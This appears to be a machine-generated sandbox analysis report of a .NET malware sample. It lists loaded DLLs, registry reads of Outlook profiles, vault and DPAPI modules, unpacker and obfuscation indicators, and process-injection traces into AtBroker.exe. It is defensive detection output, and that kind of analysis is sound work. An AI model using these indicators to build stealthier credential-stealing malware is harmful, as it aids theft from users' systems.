Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: qxXd7JaCvGdKUp8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: qxXd7JaCvGdKUp8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ATBroker.pdb source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2400726244.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000003.2345290131.0000000001565000.00000004.00000020.00020000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3322149657.0000000001575000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2401256169.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000003.2402876943.000000000439E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323387098.00000000046EE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000003.2400797068.00000000041EB000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323387098.0000000004550000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: qxXd7JaCvGdKUp8.exe, qxXd7JaCvGdKUp8.exe, 00000006.00000002.2401256169.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 0000000A.00000003.2402876943.000000000439E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323387098.00000000046EE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000003.2400797068.00000000041EB000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323387098.0000000004550000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2400726244.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000003.2345290131.0000000001565000.00000004.00000020.00020000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3322149657.0000000001575000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3321269117.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp, iKfhbNmgVEQKZlbl.exe, 0000000B.00000000.2479430947.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KW9XDNHCvSedlvrreY.cs	.Net Code: Ck4JB6b472 System.Reflection.Assembly.Load(byte[])
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KW9XDNHCvSedlvrreY.cs	.Net Code: Ck4JB6b472 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689C0D0 push cs; ret	0_2_0689C0D1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_0689AC98 push eax; iretd	0_2_0689AC99
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B026E5 push es; iretd	0_2_06B026EC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 0_2_06B024D1 push es; retf	0_2_06B02510
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0041F926 pushad ; iretd	6_2_0041F94F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_00411C97 push ebp; rep ret	6_2_00411C9C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_00418498 push ss; iretd	6_2_0041857C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0041856B push ss; iretd	6_2_0041857C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_00403580 push eax; ret	6_2_00403582
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0041AD96 push edx; retf	6_2_0041AD97
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_004195A4 push eax; retf	6_2_004195A5
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012109AD push ecx; mov dword ptr [esp], ecx	6_2_012109B6
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D4A1CF pushad ; iretd	9_2_03D4A1F8
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D43E4D push eax; retf	9_2_03D43E4E
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D42E14 push ss; iretd	9_2_03D42E25
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D4563F push edx; retf	9_2_03D45640
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D3C540 push ebp; rep ret	9_2_03D3C545
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Code function: 9_2_03D42D41 push ss; iretd	9_2_03D42E25
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045809AD push ecx; mov dword ptr [esp], ecx	10_2_045809B6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004C6021 push eax; retf	10_2_004C6022
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004CC3A3 pushad ; iretd	10_2_004CC3CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004BE714 push ebp; rep ret	10_2_004BE719
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004C4F15 push ss; iretd	10_2_004C4FF9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004C4FE8 push ss; iretd	10_2_004C4FF9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004C7813 push edx; retf	10_2_004C7814
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043EF5D2 push 00000071h; iretd	10_2_043EF5D4
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043EC00C push edi; iretd	10_2_043EC00D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043E70D9 push ds; retf	10_2_043E70E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043E529E pushad ; iretd	10_2_043E52A1
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043E43FC push edx; ret	10_2_043E4400
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043ECE58 push esp; ret	10_2_043ECE66

Source: qxXd7JaCvGdKUp8.exe

Static PE information: section name: .text entropy: 7.721669015846202

Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, ga5hBrSvbf2RDqSBKJ.cs	High entropy of concatenated method names: 'NJKBxpUnf', 'xAl8Ty85d', 'uwQPCF1jg', 'mwdXOOj1B', 'zEuNlPpwM', 'hgPGul01f', 'MvpswG6rtIbbn6L8R2', 'sEVRoTQafvAGTy4Vql', 'G2mqiFhB8', 'PAYMteehJ'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, od0jCU1WpiR4cjemZU.cs	High entropy of concatenated method names: 'kd52sKd6kF', 'Ivj2hXHE5F', 'ToString', 'AZf2fwLiwL', 'cYu2DttT7c', 'acP2VIkf79', 'xjY29kpo6R', 'cK22jXgCIc', 'Vmi2wsHphE', 'YYB2HwBvCN'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, kLFliIGRwVNta0uxrO.cs	High entropy of concatenated method names: 'M2494mr6mw', 'bCG9XPt1jL', 'fKeVouauHj', 'zAlVuJd0i1', 'rbSVc87NMX', 'H5oVO9jLa4', 'jqBVmuvoc7', 'oiFV5EtT97', 't12VK9DwMG', 'PkTVxFpikb'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KxhSX4DKH4EFsAqrTd.cs	High entropy of concatenated method names: 'Dispose', 'JiiFIFl9GL', 'hKySat62lQ', 'ahYlh0jihD', 'ijLFl00D8w', 'MXfFzOfdPc', 'ProcessDialogKey', 'ukTSCSTiKu', 'DdwSFUUyJs', 'SOASS2BhCL'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KoQimDK2GA6jrM8tGC.cs	High entropy of concatenated method names: 'RVrwyeRjVr', 'II1wiC5GwY', 'DJywB5e56i', 'MJ0w8hFtfR', 'zJIw4P1bwF', 'Ej2wPhv22l', 'aicwX51ZRZ', 'Hx5wYJsIUe', 'hD7wN2hUXQ', 'U0WwG85ocR'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, YrN5AsYdF4ywHvNXNc.cs	High entropy of concatenated method names: 'jHYDWtRnqP', 'ipuD7bonI0', 'pSqDQwJJeO', 'WMRD1nXI8N', 'gnCDZV98Pv', 'sJxDA4yQrb', 'nngDpSAYjM', 'wraDk4m6eT', 'ashDI8YmNo', 'C51DlREaeY'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, pSTiKuIXdwUUyJsQOA.cs	High entropy of concatenated method names: 'l7WR64rpfM', 'sDuRa8FVq4', 'vwfRoT3LBJ', 'kKwRuQa1WK', 'WsrRcxr7Ou', 'iTrROpPjOW', 'hZSRm6hoX5', 'wYdR5xBRvw', 'CE6RK9cKD1', 'yCZRxq3KCS'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KWfaoDbSuQTQf0GvJd.cs	High entropy of concatenated method names: 'FuAUYD9Q6J', 'lCgUNItXgg', 'JnQU6Y4WO7', 'E56UawhKwF', 'E3JUuoqgec', 'LL1UcmngRG', 'wJXUmyviNR', 'nBkU5jhTPo', 'ht4UxyDgCI', 'BJyUvZdQ3m'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, HDy5obN5bc97vhp9hd.cs	High entropy of concatenated method names: 'lUTV8nm6hv', 'uAFVPfGQOY', 'YscVYZe2lu', 'DtOVNvZyKq', 'IDDVe08vFs', 'yuGVT6qgWr', 'O42V2n0I8a', 'mNTVqoU7kk', 'Et8VRNE5mu', 'r8MVMJNNDI'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, Kh7Jgh60LOBObUbqlM.cs	High entropy of concatenated method names: 'vpwjgFmdhk', 'nKPjDepxTY', 'tpbj9uDBcx', 'kCLjwsR0nJ', 'eUDjHtCKHk', 'gOT9ZWAIfi', 'B9V9AMsCiv', 'Lwt9p7601H', 'DHv9ktQ1ay', 'Hnn9I9yawn'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, Bnd8x8pdLuiiFl9GLj.cs	High entropy of concatenated method names: 'n5wReY6o7y', 'w63R2L3OYN', 'mBRRRE03sZ', 'RjYRroo9Ls', 'WI8RENv8TZ', 'xdvR0eQrdq', 'Dispose', 'j4Aqf2LPkS', 'VpOqDyNXIR', 'IMLqVDXTab'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, vrBvtNztmh4AUkuwaN.cs	High entropy of concatenated method names: 'gqRMPY7wd4', 'zfAMY9WGZi', 'zMLMNY3Moo', 'l3IM6P5nEB', 'sGeMabMZdx', 'n6eMurvuyB', 'BHcMcGLheA', 'kVMM0ctxPS', 'avfMyOv2PG', 'UhwMi6Vu4w'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, yZhdoMFFKgYwE929rsk.cs	High entropy of concatenated method names: 'fKEMl2hjpn', 'VlxMzYgG4S', 'On1rCCZVu3', 'XMOrFSwkc4', 'Ux7rSPi5XX', 'YnOrnj4hQx', 'fosrJZCwal', 'GKVrgWGWJj', 'ybtrfnLBgG', 'VEErDmi7Lf'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, iOw9EJAbxEf7Y1oUnh.cs	High entropy of concatenated method names: 'VpA2kM461Y', 'fcJ2lmlWbN', 'moIqC2nNpi', 'MBNqFPmKiB', 'fSh2vV4KAI', 'dI32tR67WG', 'w9J2bDn4Lg', 'S8B2WTXLDW', 'h4b27MnDIM', 'DBL2QJDmcG'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, dsgSsUFCHiFVdrPhLjp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TReMvO5AJ3', 'm9OMtkxRCr', 'hBoMbC7f6x', 'I92MWZbPJL', 'Wi1M7WsBwa', 'unTMQ353uY', 'Jx3M1UNGaH'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KP7H5XQM7MJ5d83g96.cs	High entropy of concatenated method names: 'ToString', 'O8ZTvyP0yw', 'GprTaMymdF', 'dfcTo82HWC', 'sIPTukV1js', 'a5gTcvqV2N', 'XpUTOgltrG', 'krITmfjvKQ', 'T8FT5umT4P', 'Qr4TKY9cjP'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, GcjpSeWqVgPPnd3OuA.cs	High entropy of concatenated method names: 'Iyrexymkow', 'RDUetJHFNV', 'MiZeWJX9Zx', 'QAle7bPG8E', 'WWbeafuMDF', 'tEPeoTqIAG', 'waheumSBPy', 'PtfeciFfip', 'FtweOJUsWb', 'RREemQ0JBR'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KW9XDNHCvSedlvrreY.cs	High entropy of concatenated method names: 'sJOng31yXL', 'RFGnfjdS3H', 'OeMnDxCC1C', 'm4CnVZblLy', 'tjZn9ntKgf', 'FOAnjobsT1', 'YMwnw5Au5i', 'PWInHASEIp', 'WpQn3fYJUv', 'gTWnsVukIW'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, bDXHeomX60OLmfv8mJ.cs	High entropy of concatenated method names: 'q39wfT0FYn', 'CAswVGYSBp', 'V6xwjckkGd', 'fCljlxhPhQ', 'kpHjzPe9vR', 'd4PwCBKILv', 'gHlwFlVebJ', 'cN0wSvKiBF', 'iTcwn8sdCe', 'IJgwJ6SDS9'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, RHNmQRFJ7IeyjCUSgNl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tnhdRayvYI', 'rt5dMyOGMh', 'qKddrlSrIr', 't60ddLJNKB', 'lD0dEdHSML', 'EtZdLwy0P3', 'vBgd0WHxXQ'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, MKjvlhJ4S0GRiRqx2I.cs	High entropy of concatenated method names: 'rLlFwrN5As', 'uF4FHywHvN', 'Q5bFsc97vh', 'W9hFhdHLFl', 'xuxFerOOh7', 'dghFT0LOBO', 'qF4ALT4jgjdrcA39y6', 'JQnQhrrrYYReI6C1VQ', 'ctdVS3J8xVmN8oAREq', 'ODyFFERieN'
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, qBhCLflaDUBFEZ39UF.cs	High entropy of concatenated method names: 'IoHMVbEPDW', 'YIyM9ohxdc', 'CgaMj3GVRv', 'dMrMwQFDAg', 'MecMRsEg5B', 'hCrMHViA6C', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, ga5hBrSvbf2RDqSBKJ.cs	High entropy of concatenated method names: 'NJKBxpUnf', 'xAl8Ty85d', 'uwQPCF1jg', 'mwdXOOj1B', 'zEuNlPpwM', 'hgPGul01f', 'MvpswG6rtIbbn6L8R2', 'sEVRoTQafvAGTy4Vql', 'G2mqiFhB8', 'PAYMteehJ'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, od0jCU1WpiR4cjemZU.cs	High entropy of concatenated method names: 'kd52sKd6kF', 'Ivj2hXHE5F', 'ToString', 'AZf2fwLiwL', 'cYu2DttT7c', 'acP2VIkf79', 'xjY29kpo6R', 'cK22jXgCIc', 'Vmi2wsHphE', 'YYB2HwBvCN'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, kLFliIGRwVNta0uxrO.cs	High entropy of concatenated method names: 'M2494mr6mw', 'bCG9XPt1jL', 'fKeVouauHj', 'zAlVuJd0i1', 'rbSVc87NMX', 'H5oVO9jLa4', 'jqBVmuvoc7', 'oiFV5EtT97', 't12VK9DwMG', 'PkTVxFpikb'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KxhSX4DKH4EFsAqrTd.cs	High entropy of concatenated method names: 'Dispose', 'JiiFIFl9GL', 'hKySat62lQ', 'ahYlh0jihD', 'ijLFl00D8w', 'MXfFzOfdPc', 'ProcessDialogKey', 'ukTSCSTiKu', 'DdwSFUUyJs', 'SOASS2BhCL'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KoQimDK2GA6jrM8tGC.cs	High entropy of concatenated method names: 'RVrwyeRjVr', 'II1wiC5GwY', 'DJywB5e56i', 'MJ0w8hFtfR', 'zJIw4P1bwF', 'Ej2wPhv22l', 'aicwX51ZRZ', 'Hx5wYJsIUe', 'hD7wN2hUXQ', 'U0WwG85ocR'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, YrN5AsYdF4ywHvNXNc.cs	High entropy of concatenated method names: 'jHYDWtRnqP', 'ipuD7bonI0', 'pSqDQwJJeO', 'WMRD1nXI8N', 'gnCDZV98Pv', 'sJxDA4yQrb', 'nngDpSAYjM', 'wraDk4m6eT', 'ashDI8YmNo', 'C51DlREaeY'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, pSTiKuIXdwUUyJsQOA.cs	High entropy of concatenated method names: 'l7WR64rpfM', 'sDuRa8FVq4', 'vwfRoT3LBJ', 'kKwRuQa1WK', 'WsrRcxr7Ou', 'iTrROpPjOW', 'hZSRm6hoX5', 'wYdR5xBRvw', 'CE6RK9cKD1', 'yCZRxq3KCS'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KWfaoDbSuQTQf0GvJd.cs	High entropy of concatenated method names: 'FuAUYD9Q6J', 'lCgUNItXgg', 'JnQU6Y4WO7', 'E56UawhKwF', 'E3JUuoqgec', 'LL1UcmngRG', 'wJXUmyviNR', 'nBkU5jhTPo', 'ht4UxyDgCI', 'BJyUvZdQ3m'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, HDy5obN5bc97vhp9hd.cs	High entropy of concatenated method names: 'lUTV8nm6hv', 'uAFVPfGQOY', 'YscVYZe2lu', 'DtOVNvZyKq', 'IDDVe08vFs', 'yuGVT6qgWr', 'O42V2n0I8a', 'mNTVqoU7kk', 'Et8VRNE5mu', 'r8MVMJNNDI'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, Kh7Jgh60LOBObUbqlM.cs	High entropy of concatenated method names: 'vpwjgFmdhk', 'nKPjDepxTY', 'tpbj9uDBcx', 'kCLjwsR0nJ', 'eUDjHtCKHk', 'gOT9ZWAIfi', 'B9V9AMsCiv', 'Lwt9p7601H', 'DHv9ktQ1ay', 'Hnn9I9yawn'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, Bnd8x8pdLuiiFl9GLj.cs	High entropy of concatenated method names: 'n5wReY6o7y', 'w63R2L3OYN', 'mBRRRE03sZ', 'RjYRroo9Ls', 'WI8RENv8TZ', 'xdvR0eQrdq', 'Dispose', 'j4Aqf2LPkS', 'VpOqDyNXIR', 'IMLqVDXTab'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, vrBvtNztmh4AUkuwaN.cs	High entropy of concatenated method names: 'gqRMPY7wd4', 'zfAMY9WGZi', 'zMLMNY3Moo', 'l3IM6P5nEB', 'sGeMabMZdx', 'n6eMurvuyB', 'BHcMcGLheA', 'kVMM0ctxPS', 'avfMyOv2PG', 'UhwMi6Vu4w'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, yZhdoMFFKgYwE929rsk.cs	High entropy of concatenated method names: 'fKEMl2hjpn', 'VlxMzYgG4S', 'On1rCCZVu3', 'XMOrFSwkc4', 'Ux7rSPi5XX', 'YnOrnj4hQx', 'fosrJZCwal', 'GKVrgWGWJj', 'ybtrfnLBgG', 'VEErDmi7Lf'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, iOw9EJAbxEf7Y1oUnh.cs	High entropy of concatenated method names: 'VpA2kM461Y', 'fcJ2lmlWbN', 'moIqC2nNpi', 'MBNqFPmKiB', 'fSh2vV4KAI', 'dI32tR67WG', 'w9J2bDn4Lg', 'S8B2WTXLDW', 'h4b27MnDIM', 'DBL2QJDmcG'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, dsgSsUFCHiFVdrPhLjp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TReMvO5AJ3', 'm9OMtkxRCr', 'hBoMbC7f6x', 'I92MWZbPJL', 'Wi1M7WsBwa', 'unTMQ353uY', 'Jx3M1UNGaH'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KP7H5XQM7MJ5d83g96.cs	High entropy of concatenated method names: 'ToString', 'O8ZTvyP0yw', 'GprTaMymdF', 'dfcTo82HWC', 'sIPTukV1js', 'a5gTcvqV2N', 'XpUTOgltrG', 'krITmfjvKQ', 'T8FT5umT4P', 'Qr4TKY9cjP'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, GcjpSeWqVgPPnd3OuA.cs	High entropy of concatenated method names: 'Iyrexymkow', 'RDUetJHFNV', 'MiZeWJX9Zx', 'QAle7bPG8E', 'WWbeafuMDF', 'tEPeoTqIAG', 'waheumSBPy', 'PtfeciFfip', 'FtweOJUsWb', 'RREemQ0JBR'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KW9XDNHCvSedlvrreY.cs	High entropy of concatenated method names: 'sJOng31yXL', 'RFGnfjdS3H', 'OeMnDxCC1C', 'm4CnVZblLy', 'tjZn9ntKgf', 'FOAnjobsT1', 'YMwnw5Au5i', 'PWInHASEIp', 'WpQn3fYJUv', 'gTWnsVukIW'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, bDXHeomX60OLmfv8mJ.cs	High entropy of concatenated method names: 'q39wfT0FYn', 'CAswVGYSBp', 'V6xwjckkGd', 'fCljlxhPhQ', 'kpHjzPe9vR', 'd4PwCBKILv', 'gHlwFlVebJ', 'cN0wSvKiBF', 'iTcwn8sdCe', 'IJgwJ6SDS9'
